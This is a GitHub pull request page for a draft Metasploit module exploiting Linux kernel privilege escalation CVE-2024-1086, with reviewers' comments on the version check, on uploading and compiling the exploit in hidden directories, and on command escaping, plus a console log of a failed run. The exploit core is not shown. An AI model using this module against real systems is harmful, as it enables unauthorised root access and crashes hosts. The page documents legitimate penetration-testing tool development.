Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

WIP: LPE CVE-2024-1086 #19625

Draft
wants to merge 1 commit into
base: master
Choose a base branch
from
Draft

WIP: LPE CVE-2024-1086 #19625

wants to merge 1 commit into from
+382 −0

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Nov 8, 2024
edited
Loading

Fixes: #19153

WIP exploit for CVE-2024-1086 . Running the exploit by hand on the box seems fairly reliable. However running it through metasploit currently results in about 75% hard lock of the box either instantly, or within 6min. 25% of the time its perfect though!

Only been testing the live build functionality, not the 'drop a pre-complied binary' branch

I forgot to bring along a bunch of the library files as well, so need to add those back.

jvoisin
jvoisin reviewed Nov 8, 2024
View reviewed changes
modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb
Comment on lines +81 to +91
release = kernel_release
if (
Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
) ||
(
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
)
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Suggested change
release = kernel_release
if (
Rex::Version.new(release.split('-').first) >= Rex::Version.new('5.15.0') &&
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.0')
) ||
(
Rex::Version.new(release.split('-').first) < Rex::Version.new('6.6') &&
Rex::Version.new(release.split('-').first) >= Rex::Version.new('6.0')
)
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end
release = kernel_release().split('-').first
if release.between(Rex::Version.new('5.15.0'), Rex::Version.new('6.0'))
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
elsif release.between(Rex::Version.new('6.0'), Rex::Version.new('6.6'))
return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
end

but it seems that this can be simplified even further to:

    release = kernel_release().split('-').first
    if release.between(Rex::Version.new('5.15.0'), Rex::Version.new('6.6'))
      return CheckCode::Appears("Kernel version #{release} appears to be vulnerable")
    end

modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb
end

def check_musl_tools?
lib = cmd_exec('dpkg --get-selections | grep musl-tools')
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This will only work on Debian :/

modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb
zip.add_file(file.split('CVE-2024-1086/')[1], file_contents)
end
print_status('Finished creating exploit source zip, uploading...')
zip_path = "#{nested_base}/.#{rand_text_alphanumeric(5..10)}.zip"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can't the files be concatenated instead?

modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

nested_base = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

A couple of IDS are flagging binary execution happening instead hidden folders. I think it'd be better to let the user specify the full path of the folder.

@h00die h00die mentioned this pull request Nov 12, 2024
Open
smcintyre-r7
smcintyre-r7 reviewed Nov 14, 2024
View reviewed changes
modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb
Comment on lines +147 to +153
if command_exists?('python3')
cmd_exec "python3 -m zipfile -e #{zip_path} #{nested_base}"
else
cmd_exec "unzip #{zip_path} -d #{nested_base}"
end
print_status('Compiling')
cmd_exec "cd #{nested_base}; make"
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The nested_base value contains a portion that is user specified from the WritableDir datastore option. If that value contains a space, then these commands will fail.

We've recently added a new command execution API to handle these cases correctly and t should generally be used when the command is not static.

As an example the first one should be create_process('python3', args: ['-m', 'zipfile', '-e', zip_path, nested_base]).

The new #create_process method will take the arguments and ensure that they are escaped correctly for you given the context in which they're executed (platform, session type, etc.).

modules/exploits/linux/local/netfilter_nf_tables_priv_esc.rb
'Notes' => {
'Stability' => [CRASH_OS_DOWN],
'Reliability' => [UNRELIABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, SCREEN_EFFECTS]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is SCREEN_EFFECTS due to the system locking up here? If not would you mind dropping a comment to clarify.

@msutovsky-r7
Copy link
Contributor

Not really sure if it applies here as this PR is marked as draft, but I have been doing review for #19745 and noticed following:

msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/netfilter_nf_tables_priv_esc) > run
[*] Started reverse TCP handler on 192.168.95.128:4444 
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Kernel version 5.15.0-126-generic appears to be vulnerable
[*] Creating /tmp/.AwYfaDUz
[-] Exploit failed: ArgumentError wrong number of arguments (given 1, expected 2)
[*] Exploit completed, but no session was created.

Not really sure if it's caused by escape fix, but it might be worth having it noted here. I'll investigate more later on.

@msutovsky-r7 msutovsky-r7 self-assigned this Dec 20, 2024
# for free to join this conversation on GitHub. Already have an account? # to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

At least 1 approving review is required to merge this pull request.

Assignees

@msutovsky-r7 msutovsky-r7

Labels
docs module
Projects
Metasploit Kanban
Status: Waiting on Contributor
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Linux LPE (CVE-2024-1086)
4 participants
@h00die @msutovsky-r7 @jvoisin @smcintyre-r7